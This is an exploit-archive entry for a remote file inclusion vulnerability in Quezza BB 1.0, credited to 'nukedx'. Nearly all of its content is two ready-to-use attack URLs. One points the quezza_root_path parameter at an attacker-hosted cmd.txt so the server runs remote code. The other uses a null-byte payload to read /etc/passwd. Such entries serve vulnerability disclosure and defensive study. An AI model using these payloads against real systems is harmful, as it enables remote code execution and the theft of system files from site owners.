id: 426
date: 05/16/2006
title: Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability
author: nukedx
cves: 

================================================================
Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability
================================================================



Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on Quezza BB <= 1.0
Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
Succesful exploitation register_globals on for both examples.




#  0day.today [2023-03-22]  #